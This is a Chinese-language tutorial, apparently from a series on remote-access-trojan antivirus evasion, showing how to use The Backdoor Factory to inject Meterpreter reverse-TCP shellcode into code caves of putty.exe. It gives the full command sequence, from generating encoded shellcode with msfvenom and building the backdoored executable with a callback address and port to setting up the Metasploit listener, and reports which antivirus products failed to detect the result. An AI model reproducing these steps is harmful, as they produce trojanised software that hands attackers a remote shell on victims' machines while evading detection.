0x01 免殺能力一查表

幾點(diǎn)說(shuō)明：

1、上表中標(biāo)識(shí) √ 說(shuō)明相應(yīng)殺毒軟件未檢測(cè)出病毒，也就是代表了Bypass。

2、為了更好的對(duì)比效果，大部分測(cè)試payload均使用msf的windows/meterperter/reverse_tcp模塊生成。

3、由于本機(jī)測(cè)試時(shí)只是安裝了360全家桶和火絨，所以默認(rèn)情況下360和火絨殺毒情況指的是靜態(tài)+動(dòng)態(tài)查殺。360殺毒版本5.0.0.8160(2019.12.12)，火絨版本5.0.33.13(2019.12.12)，360安全衛(wèi)士12.0.0.2001(2019.12.17)。

4、其他殺軟的檢測(cè)指標(biāo)是在virustotal.com（簡(jiǎn)稱(chēng)VT）上在線(xiàn)查殺，所以可能只是代表了靜態(tài)查殺能力，數(shù)據(jù)僅供參考，不足以作為免殺的精確判斷指標(biāo)。

5、完全不必要苛求找一種能bypass所有殺軟的免殺技術(shù)，這樣的技術(shù)肯定是有的，只是沒(méi)被公開(kāi)，一旦公開(kāi)第二天就能被殺了，其實(shí)我們只要能bypass目標(biāo)主機(jī)上的殺軟就足夠了。

0x02 BDF介紹

BackDoor-factory，又稱(chēng)后門(mén)工廠(chǎng)(BDF)，BDF是也是一款老牌的免殺神器，其作者曾經(jīng)在2015年的blackhat大會(huì)上介紹過(guò)該工具。但是作者已經(jīng)于2017年停止更新，免殺效果就算現(xiàn)在來(lái)看也還算不錯(cuò)的。
原理：可執(zhí)行二進(jìn)制文件中有大量的00,這些00是不包含數(shù)據(jù)的,將這些數(shù)據(jù)替換成payload,并且在程序執(zhí)行的時(shí)候,jmp到代碼段,來(lái)觸發(fā)payload

0x03 安裝BDF

官方地址：

https://github.com/secretsquirrel/the-backdoor-factory

方法一、如果使用kali或parrot，系統(tǒng)中已經(jīng)安裝好了BDF。
如果找不到的話(huà)可以使用locate命令查找一下：

locate backdoor.py | more

方法二、如果系統(tǒng)里沒(méi)有安裝，則需要手動(dòng)安裝

ubuntu里可以直接，kali里不能直接安裝

apt-get update apt-get install backdoor-factor

方法三、使用docker

BDF作者也考慮到安裝容易出問(wèn)題，所以提供了docker環(huán)境：

docker pull secretsquirrel/the-backdoor-factory docker run -it secretsquirrel/the-backdoor-factory bash

0x04 直接生成免殺后門(mén)

backdoor-factory是把shellcode插入到一個(gè)正常的exe文件的代碼"縫隙"中，類(lèi)似于捆綁但不是捆綁，所以需要提前準(zhǔn)備一個(gè)被捆綁的宿主exe文件，我這是還是用之前的putty.exe為例。
執(zhí)行python backdoor.py：

4.1、首先檢查宿主exe是否被支持

在"捆綁"之前，BDF需要檢查一下宿主exe能否被支持"插入"shellcode。
主要使用下面兩個(gè)參數(shù)

-f：指定測(cè)試程序-S：檢查該程序是否支持

在使用下面命令前，首先將putty.exe復(fù)制到docker容器里，如何復(fù)制，看這篇文章：
https://editor.csdn.net/md/?articleId=104808903
復(fù)制之后，檢查命令:

python backdoor.py -f /root/putty.exe -S

說(shuō)明putty.exe可以被支持。

4.2 搜索該文件可用的code Caves（代碼縫隙）

使用命令./backdoor.py -f test.exe -c -l 600

-c：code cave(代碼裂縫)-l：代碼裂縫大小

發(fā)現(xiàn)1個(gè)可用代碼縫隙,一般shellcode大小300字節(jié)，所以選擇一個(gè)適當(dāng)?shù)目p隙就可以。

4.3 獲取該文件的可用payload

./backdoor.py -f /root/putty.exe -s -show

如上圖所示，會(huì)有很多的可利用payload。

• cave_miner_inline:作為payload模板，長(zhǎng)度為135，僅實(shí)現(xiàn)了控制流程跳轉(zhuǎn)，不做其他操作，可用作自定義開(kāi)發(fā)shellcode的模板
• reverse_shell_tcp_inline：對(duì)應(yīng)的msf：use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp
• meterpreter_reverse_https_threaded：對(duì)應(yīng)的msf：use exploit/multi/handlerset payload windows/meterpreter/reverse_https
• iat_reverse_tcp_inline中的iat：iat為Import Address Table(導(dǎo)入地址表)的縮寫(xiě)，如果PE文件的IAT不包含API LoadLibraryA和GetProcAddress，直接執(zhí)行payload reverse_shell_tcp_inline會(huì)失敗，iat_reverse_tcp_inline增加了修復(fù)IAT的功能，避免執(zhí)行失敗
• iat_reverse_tcp_stager_threaded:增加了修復(fù)IAT的功能
• user_supplied_shellcode_threaded：對(duì)應(yīng)的msf：use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp``自定義shellcode

4.4 生成payload

推薦使用的命令：

./backdoor.py -f /root/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.142.134 -P 5555 -J -o payload.exe -c：code cave(代碼裂縫)-l：代碼裂縫大小-s：選擇使用 payload 類(lèi)型-H：選擇回連服務(wù)器地址-P：回連服務(wù)器端口-J：使用多代碼裂縫注入

選擇一個(gè)代碼段進(jìn)行插入shellcode，最后就可以生產(chǎn)新的后門(mén)程序。

我們可以看到payload.exe在backdoored文件夾下，將文件先移動(dòng)到/root/shell文件夾下，再?gòu)?fù)制到宿主機(jī)子里


操作之后，文件就在我們的機(jī)子里了

4.5 免殺測(cè)試

運(yùn)行payload.exe，發(fā)現(xiàn)360衛(wèi)士和殺毒可查殺，火絨未檢測(cè)到病毒。

0x05 使用自己定義的shellcode

先用msfvenom生成raw格式的shellcode：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c

將文件復(fù)制到docker容器，再使用backdoor的user_supplied_shellcode_threaded模塊加載自定義的shellcode

./backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c -o payload2.exe

msf監(jiān)聽(tīng)可上線(xiàn)：

msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set lhost 10.211.55.2 lhost => 10.211.55.2 msf exploit(handler) > set lport 3333 lport => 3333 msf exploit(handler) > exploit

但是360依然可以查殺

0x06 小結(jié)

利用backdoor-factory使用，用戶(hù)可以在不破壞原有可執(zhí)行文件的功能的前提下，在文件的代碼裂隙中插入惡意代碼Shellcode。當(dāng)可執(zhí)行文件被執(zhí)行后，就可以觸發(fā)惡意代碼。Backdoor Factory不僅提供常用的腳本，還允許嵌入其他工具生成的Shellcode，如Metasploit。

該工具還有很強(qiáng)大的一些其他功能，比如加私鑰證書(shū)、CPT等等，雖然目前軟件已經(jīng)不再更新，但免殺效果至今依然不錯(cuò)也能管中窺豹看到它的強(qiáng)悍之處。

0x07 參考資料

利用BDF向EXE文件植入后門(mén):https://3gstudent.github.io/3gstudent.github.io/%E5%88%A9%E7%94%A8BDF%E5%90%91EXE%E6%96%87%E4%BB%B6%E6%A4%8D%E5%85%A5%E5%90%8E%E9%97%A8/

backdoor-factory使用簡(jiǎn)介：https://www.lstazl.com/backdoor-factory%E4%BD%BF%E7%94%A8%E7%AE%80%E4%BB%8B/

backdoor-factory使用：https://www.cnblogs.com/-qing-/p/11421709.html

總結(jié)

以上是生活随笔為你收集整理的远控免杀专题8---BackDoor-Facktory免杀的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。